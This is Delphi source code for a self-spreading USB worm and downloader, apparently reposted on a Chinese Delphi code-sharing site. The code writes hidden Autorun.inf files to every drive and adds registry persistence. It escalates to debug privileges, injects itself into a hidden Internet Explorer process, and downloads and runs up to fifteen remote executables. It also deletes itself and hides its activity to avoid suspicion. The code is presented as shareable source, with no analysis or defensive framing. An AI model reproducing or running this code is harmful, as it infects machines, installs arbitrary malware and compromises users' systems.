InfFile := DriveName + 'Autorun.inf';
MmFile := DriveName + ExeName;
if (not FileExists(InfFile)) then
begin
AssignFile(InfText, InfFile);
try
ReWrite(InfText);
WriteLn(InfText, '[AutoRun]');
WriteLn(InfText, 'open=' + ExeName);
WriteLn(InfText, 'shellexecute=' + ExeName);
WriteLn(InfText, 'shell\Auto\command=' + ExeName);
finally
CloseFile(InfText);
end;
SetFileAttributes(pchar(inffile), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
end;
if (not FileExists(MmFile)) then
begin
CopyFile(pchar(ParamStr(0)), pchar(MmFile), false);
SetFileAttributes(pchar(MmFile), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
end;
end;
function IsFileInUse(fName: string): boolean;
var
HFileRes: HFILE;
begin
Result := false;
if not FileExists(fName) then
exit;
HFileRes := CreateFile(pchar(fName), GENERIC_READ or GENERIC_WRITE,
0 {this is the trick!}, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
Result := (HFileRes = INVALID_HANDLE_VALUE);
if not Result then
CloseHandle(HFileRes);
end;
procedure dir;
begin
if not directoryexists(pchar('C:\Program Files\WindowsUpdate\')) then
try
createdir(pchar('C:\Program Files\WindowsUpdate\'));
except
end;
end;
procedure regme;
begin
SetRegValue(HKEY_LOCAL_MACHINE,
'SoftWare\Microsoft\Windows\CurrentVersion\policies\Explorer\Run', 'Lying', exefile); //自启动
SetRegValue(HKEY_LOCAL_MACHINE,
'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL',
'CheckedValue', '2'); //强制隐藏系统文件
end;
procedure infect();
var
i, len: integer;
driverlist: string;
begin
DriverList := GetDrives;
Len := Length(DriverList);
for i := Len downto 1 do
SendMetoDriver(DriverList[i] + ':\');
end;
function GetOnlineStatus: Boolean;
var
ConTypes: Integer;
begin
ConTypes := INTERNET_CONNECTION_MODEM + INTERNET_CONNECTION_LAN +
INTERNET_CONNECTION_PROXY;
if (InternetGetConnectedState(@ConTypes, 0) = False) then
Result := False
else
Result := True;
end;
procedure GetDebugPrivs; //提升进程权限
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dword;
begin
if (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or
TOKEN_QUERY, hToken)) then
begin
LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end;
procedure TimerProc(uID, uMsg, dwUser, dw1, dw2: DWORD); stdcall;
//网络连接时启动各种功能和下载
begin
try
infect;
except
end;
if GetOnlineStatus and not dw then
begin
try
GetDebugPrivs;
RunInject(1); //1 注入iexplore.exe
except
end;
dw := true;
end;
//timeKillEvent(hTimer3);
end;
procedure infecttimer; stdcall;
begin
//Messagebox(0,pchar(time1+' '+hostbc+' '+urlbc),'数据', MB_OK);
hTimer := TimeSetEvent(6000, 0, TimerProc, 0, TIME_PERIODIC);
while (GetMessage(Msg, 0, 0, 0)) do
;
end;
procedure AutoAndw0rM;
var
tid: dword;
begin
dw := false;
if pos('pagefile.pif', pchar(paramstr(0))) > 0 then exitprocess(0);
CreateMutex(nil, TRUE, 'dx'); //TRUE 标明该进程拥有此 Mutex 对象
if (GetLastError = ERROR_ALREADY_EXISTS) then exit; //Mutex 对象是否存在
dir;
regme; //加载注册表
CreateThread(nil, 0, @infecttimer, nil, 0, TID);
while (GetMessage(Msg, 0, 0, 0)) do
;
end;
procedure Download; //下载过程
begin
// dw := true; //下载了一次
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell := LoadLibrary('Shell32.dll');
hUrlmon := LoadLibrary('urlmon.dll');
@ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
@Downfile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');
{if not directoryexists(pchar('C:\Program Files\WindowsUpdate\')) then
try
createdir(pchar('C:\Program Files\WindowsUpdate\'));
except
end; }
try
Downfile(nil,pchar(url1),'C:\Program Files\WindowsUpdate\1.exe', 0, nil);
ShellRun(0,'open','C:\Program Files\WindowsUpdate\1.exe',nil,nil,5);
except
end;
{Downfile(nil, pchar('http://www.mybr.org/test/a.exe'),
'C:\Program Files\WindowsUpdate\1.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\1.exe', nil, nil, 5);
}
try
Downfile(nil, pchar(url2), 'C:\Program Files\WindowsUpdate\2.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\2.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url3), 'C:\Program Files\WindowsUpdate\3.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\3.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url4), 'C:\Program Files\WindowsUpdate\4.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\4.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url5), 'C:\Program Files\WindowsUpdate\5.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\5.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url6), 'C:\Program Files\WindowsUpdate\6.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\6.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url7), 'C:\Program Files\WindowsUpdate\7.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\7.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url8), 'C:\Program Files\WindowsUpdate\8.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\8.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url9), 'C:\Program Files\WindowsUpdate\9.exe', 0, nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\9.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url10), 'C:\Program Files\WindowsUpdate\10.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\10.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url11), 'C:\Program Files\WindowsUpdate\11.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\11.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url12), 'C:\Program Files\WindowsUpdate\12.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\12.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url13), 'C:\Program Files\WindowsUpdate\13.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\13.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url14), 'C:\Program Files\WindowsUpdate\14.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\14.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url15), 'C:\Program Files\WindowsUpdate\15.exe', 0,
nil);
ShellRun(0, 'open', 'C:\Program Files\WindowsUpdate\15.exe', nil, nil, 5);
except
end;
//ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer); //注入
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) +
PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
createRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure setme;
begin
if (CompareText(ParamStr(0), Copy(ParamStr(0), 1, 3) + ExeName) = 0) and
(CompareText(ExtractFileName(ParamStr(0)), exename) = 0) then
begin
sa1 := Findwindow('CabinetWClass', nil); //我的电脑
if GetForegroundwindow <> sa1 then exit;
sa1 := findwindowex(sa1, 0, 'WorkerW', nil);
sa1 := findwindowex(sa1, 0, 'ReBarWindow32', nil);
sa1 := findwindowex(sa1, 0, 'ComboBoxEx32', nil);
sa2 := findwindowex(sa1, 0, 'ToolbarWindow32', nil);
sa1 := findwindowex(sa1, 0, 'ComboBox', nil);
sa1 := findwindowex(sa1, 0, 'Edit', nil);
OpenPath := Copy(ParamStr(0), 1, 3);
SendMessage(sa1, WM_SETTEXT, length(OpenPath), longint(pchar(OpenPath)));
SendMessage(sa2, WM_LBUTTONDOWN, 0, 0);
SendMessage(sa2, WM_LBUTTONUP, 0, 0);
SendMessage(sa1, WM_KILLFOCUS, 0, 0); //去掉焦点,避免怀疑...
NoDel := 1;
end;
if IsFileInUse(exefile) = false then
begin
SetFileAttributes(pchar(exefile), 0);
DeleteFile(pchar(exefile));
Copyfile(pchar(ParamStr(0)), pchar(exefile), false);
SetFileAttributes(pchar(exefile), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
winexec(pchar(exefile), sw_hide);
end;
//AutoAndw0rM;
if (NoDel <> 1) then DelMe; //如果nodel这个变量<>1,就自删除
ExitProcess(0);
end;
procedure RunInject(InjType: integer);
var
ProcessHandle, PID: longword;
begin
if InjType = 0 then //注入explorer.exe
begin
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else //注入iexplore.exe
begin
//createProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar('C:\Program Files\Internet Explorer\IEXPLORE.EXE'), sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
//sleep(500);
//ExtDelMe;
end;
end;
begin
exefile := Pchar(GetDirectory(2) + ExeName);
if CompareText(ParamStr(0), exefile) <> 0 then
setme
else
begin
AutoAndw0rM;
// ExitProcess(0);
end;
end.
推荐分享
图文皆来源于网络,内容仅做公益性分享,版权归原作者所有,如有侵权请告知删除!
Copyright © 2014 DelphiW.com 开发 源码 文档 技巧 All Rights Reserved
晋ICP备14006235号-8 晋公网安备 14108102000087号
执行时间: 0.043174982070923 seconds